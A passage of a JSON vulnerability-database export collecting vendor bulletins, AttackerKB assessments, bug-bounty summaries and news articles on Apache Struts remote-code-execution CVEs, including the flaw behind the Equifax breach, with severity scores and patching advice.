"NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-19T05:03:06", "id": "ATLASSIAN:CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T19:10:15", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-30T21:21:15", "id": "CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:44:49", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:30pm UTC reported:\n\nUnlike [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>), which was exploitable out of the box, since it targeted Struts\u2019 Jakarta multipart parser, this vulnerability requires a certain set of circumstances to be true in order for Struts to be exploitable. Since Struts is a web application framework, this will depend entirely on the application the developers have created.\n\n**I don\u2019t know how common this particular scenario is.** Please read the [security bulletin](<https://cwiki.apache.org/confluence/display/WW/S2-059>) for more information. However, what I do know is that this CVE falls somewhere after [CVE-2017-5638](<https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638>) and [CVE-2018-11776](<https://attackerkb.com/topics/jgIUjIdFUR/cve-2018-11776>) on the exploitability scale, from most exploitable to least: a parser flaw, a configuration flaw, and a programming flaw.\n\nSo, definitely patch this, but also follow Struts development best practices, including those outlined in their security bulletins. 
No measure of mitigations will protect you from poorly written code.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776", "CVE-2019-0230"], "modified": "2023-10-07T00:00:00", "id": "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "href": "https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:46", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 03, 2020 4:29pm 
UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\n**hrbrmstr** at May 12, 2020 7:45pm UTC reported:\n\nThis popped Equifax. Vulnerable versions of Struts are exploitable out of the box, since this was a parser flaw. Make sure this is patched!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-10-05T00:00:00", "id": "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "href": "https://attackerkb.com/topics/1MWtVe9P7w/cve-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:38:48", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. 
This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at October 15, 2020 10:48pm UTC reported:\n\nThere\u2019s high attacker value here if an attacker A) wants to cause a little mayhem, and/or B) can actually turn the DoS into reliable RCE. The first option is probably the likelier outcome in the immediate future. If [Positive Technologies](<https://twitter.com/ptswarm/status/1316838270538575877>) or Tripwire releases a PoC, the likelihood of broad exploitation probably rises significantly. For now, \u201cpatch fast but don\u2019t panic\u201d is good advice, as it always is with VPNs. There\u2019s full analysis for this bug in the [Rapid7 Analysis tab here](<https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135#rapid7-analysis>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-5135", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2020-5135"], "modified": "2023-10-07T00:00:00", "id": "AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "href": "https://attackerkb.com/topics/WzuBknGmx1/cve-2020-5135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T23:33:10", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 \u2013 Struts 2.5.25.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2020 6:53pm UTC reported:\n\nSee my [assessment](<https://attackerkb.com/assessments/92642728-1fa2-4a4e-9750-297f18f0cc0b>) on [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230>). [Apache themselves](<https://cwiki.apache.org/confluence/display/WW/S2-061>) said this is similar to [S2-059](<https://cwiki.apache.org/confluence/display/WW/S2-059>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-15T00:00:00", "id": "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B", "href": "https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-02-08T16:15:37", "description": " * [CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \nForced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.\n * [CVE-2021-31805](<https://vulners.com/cve/CVE-2021-31805>) \nThe fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag's attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n\nImpact\n\nUsing a forced Object-Graph Navigation Language (OGNL) evaluation on untrusted user input allows an attacker to perform remote code execution leading to security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-22T01:45:00", "type": "f5", "title": "Apache Struts vulnerabilities CVE-2020-17530 and CVE-2021-31805", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-15T23:18:00", "id": "F5:K24608264", "href": "https://support.f5.com/csp/article/K24608264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T12:56:14", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string. 
([CVE-2017-5638](<https://vulners.com/cve/CVE-2017-5638>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n\n**Note**: For information about using an iRule to protect your web servers behind the BIG-IP virtual server, refer to the **Security Advisory Recommended Actions** section.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T20:36:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2017-5638", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-02-14T17:54:00", "id": "F5:K43451236", "href": "https://support.f5.com/csp/article/K43451236", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-08-01T00:57:28", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. Thank you @n0rb3r7 for notifying us of this vulnerability!\nI was able to leverage a recent, well-known vulnerability to achieve arbitrary, remote command execution on a U.S. 
Department Of Defense server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T04:14:12", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-07-03T18:23:05", "id": "H1:212985", "href": "https://hackerone.com/reports/212985", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-06T16:00:44", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. 
Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-13T13:22:29", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-05-31T21:36:13", "id": "H1:213069", "href": "https://hackerone.com/reports/213069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-01T01:06:10", "bounty": 0.0, "description": "A remote code execution (RCE) vulnerability was found on a DoD website which could have enabled an attacker to execute remote commands on the web server. @0daystolive and @dly were able to demonstrate this vulnerability by developing a custom script that caused the webserver to execute a benign command. This was a very clever demonstration. 
Thank you!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-09T17:59:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-06-01T14:48:16", "id": "H1:212022", "href": "https://hackerone.com/reports/212022", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:40:51", "description": "[](<https://thehackernews.com/images/-1V4miBZKvxA/W6OU7pQw5sI/AAAAAAAAyLM/GdXx9FNEs_UiDXCnBFucDDfdR_AGIzUkwCLcBGAs/s728-e100/equifax-data-breach.jpg>)\n\nAtlanta-based consumer credit reporting agency Equifax has been issued a \u00a3500,000 fine by the UK's privacy watchdog for its last year's [massive data breach](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) that exposed personal and financial data of hundreds of millions of its customers. \n \nYes, \u00a3500,000\u2014that's the maximum fine allowed by the UK's Data Protection Act 1998, though the penalty is apparently a small figure for a $16 billion company. 
\n \nIn July this year, the UK's data protection watchdog issued the maximum allowed fine of [\u00a3500,000 on Facebook](<https://thehackernews.com/2018/07/facebook-cambridge-analytica.html>) over the [Cambridge Analytica scandal](<https://thehackernews.com/2018/03/facebook-cambridge-analytica.html>), saying the social media giant failed to prevent UK citizens' data from falling into the wrong hands. \n \n\n\n## Flashback: The Equifax Data Breach 2017\n\n \nEquifax suffered a massive data breach last year between mid-May and the end of July, exposing highly [sensitive data of as many as 145 million people](<https://thehackernews.com/2017/10/equifax-credit-security-breach.html>) globally. \n \nThe stolen information included victims' names, dates of birth, phone numbers, driver's license details, addresses, and social security numbers, along with credit card information and personally identifying information (PII) for hundreds of thousands of its consumers. \n \nThe data breach occurred because the company failed to patch a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/09/equifax-apache-struts.html>) ([CVE-2017-5638](<https://thehackernews.com/2017/03/apache-struts-framework.html>)) on time, even though a patch had already been issued. \n \n\n\n## Why Has the U.K. Fined a US Company?\n\n \nThe UK's Information Commissioner's Office (ICO), which launched a joint investigation into the breach with the Financial Conduct Authority, has now [issued](<https://ico.org.uk/about-the-ico/news-and-events/news-and-blogs/2018/09/credit-reference-agency-equifax-fined-for-security-breach/>) its largest possible monetary penalty under the country's Data Protection Act for the massive data breach\u2014\u00a3500,000, which equals around $665,000. 
\n \nThe ICO said that although the [cyber attack compromised Equifax](<https://thehackernews.com/2017/09/equifax-data-breach.html>) systems in the United States, the company \"failed to take appropriate steps\" to protect the personal information of its 15 million UK customers. \n \nThe ICO investigation revealed \"multiple failures\" at the company, such as keeping users' personal information longer than necessary, which resulted in: \n\n\n * 19,993 UK customers had their names, dates of birth, telephone numbers and driving license numbers exposed.\n * 637,430 UK customers had their names, dates of birth and telephone numbers exposed.\n * Up to 15 million UK customers had names and dates of birth exposed.\n * Some 27,000 Britons also had their Equifax account email addresses swiped.\n * 15,000 UK customers also had their names, dates of birth, addresses, account usernames and plaintext passwords, account recovery secret questions and answers, obscured credit card numbers, and spending amounts stolen by hackers.\n \n\n\n## Breach Was Result of Multiple Failures at Equifax\n\n \nThe ICO said that Equifax had also been warned about a [critical Apache Struts 2 vulnerability](<https://thehackernews.com/2017/03/apache-struts-framework.html>) in its systems by the United States Department of Homeland Security (DHS) in March 2017, but the company did not take appropriate steps to fix the issue. \n \nInitially, it was also reported that the company kept news of the [breach hidden for a month](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>) after its internal discovery, giving three senior executives at Equifax time to sell almost $2 million worth of its shares, though the company denied such claims. \n \nSince the data breach happened before the EU's General Data Protection Regulation (GDPR) took effect in May 2018, the case fell under the UK's old Data Protection Act 1998, whose maximum fine of \u00a3500,000 is comparatively small. 
\n \nThe penalty could have been much larger had it fallen under GDPR, under which a company could face a [maximum fine of 20 million euros](<https://thehackernews.com/2017/08/data-breach-security-law.html>) or 4 percent of its annual global revenue, whichever is higher, for such a privacy breach. \n \nIn response to the ICO's penalty, Equifax said that the company fully cooperated with the ICO throughout the investigation, but that it is \"disappointed in the findings and the penalty.\" \n \nEquifax received the Monetary Penalty Notice from the ICO on Wednesday and can appeal the penalty.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-09-20T13:54:00", "type": "thn", "title": "UK Regulator Fines Equifax \u00a3500,000 Over 2017 Data Breach", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-09-20T13:54:52", "id": "THN:AF93AEDBDE6169AD1163D53979A4EA04", "href": "https://thehackernews.com/2018/09/equifax-credit-reporting-breach.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:16", "description": 
"[](<https://4.bp.blogspot.com/-YbGPFiDfo54/WMFEMrkhUUI/AAAAAAAArt0/axO9fhieprw6xBp0DoBNdECPB4t_le8uwCLcB/s1600/apache-struts-framework.png>)\n\nSecurity researchers have discovered a Zero-Day vulnerability in the popular Apache Struts web application framework, which is being actively exploited in the wild. \n \nApache Struts is a free, open-source, Model-View-Controller (MVC) framework for creating elegant, modern Java web applications, which supports REST, AJAX, and JSON. \n \nIn a [blog post](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) published Monday, Cisco's Threat intelligence firm Talos announced the team observed a number of active attacks against the zero-day vulnerability (CVE-2017-5638) in Apache Struts. \n \nAccording to the researchers, the issue is a remote code execution vulnerability in the Jakarta Multipart parser of Apache Struts that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n\n\n> \"It is possible to perform an RCE attack with a malicious Content-Type value,\" [warned](<https://cwiki.apache.org/confluence/display/WW/S2-045>) Apache. \"If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.\"\n\nThe vulnerability, documented at Rapid7's Metasploit Framework [GitHub site](<https://github.com/rapid7/metasploit-framework/issues/8064>), has been patched by Apache. So, if you are using the Jakarta-based file upload Multipart parser under Apache Struts 2, you are advised to upgrade to Apache Struts version 2.3.32 or 2.5.10.1 immediately. \n \n\n\n### Exploit Code Publicly Released\n\n \nSince the Talos researchers detected public proof-of-concept (PoC) exploit code (which was uploaded to a Chinese site), the vulnerability is quite dangerous. 
\n \nThe researchers even detected \"a high number of exploitation events,\" the majority of which seem to be leveraging the publicly released PoC that is being used to run various malicious commands. \n\n\n[](<https://2.bp.blogspot.com/-OMaYI0kDfZk/WME-W6XvmwI/AAAAAAAArtc/4rw52IxHjJYLJOlufdQEoxxQwjYWAbGmQCLcB/s1600/apache-exploit-code.png>)\n\nIn some cases, the attackers executed simple \"whoami\" commands to see if the target system is vulnerable, while in others, the malicious attacks turned off firewall processes on the target and dropped payloads. \n\n\n[](<https://2.bp.blogspot.com/-1fS7Z-ZsPgA/WME-E_vWvTI/AAAAAAAArtY/k_8FmAtSwaU9ICPEjN1gQMTdPHsQSRyFACLcB/s1600/apache-exploit.png>)\n\n \n\n\n> \"Final steps include downloading a malicious payload from a web server and execution of said payload,\" the researchers say. \"The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the Bill Gates botnet... A payload is downloaded and executed from a privileged account.\"\n\nAttackers also attempted to gain persistence on infected hosts by adding a binary to the boot-up routine. \n \nAccording to the researchers, the attackers tried to copy the file to a benign directory and ensure \"that both the executable runs and that the firewall service will be disabled when the system boots.\" \n \nBoth Cisco and Apache researchers urge administrators to upgrade their systems to Apache Struts version 2.3.32 or 2.5.10.1 as soon as possible. 
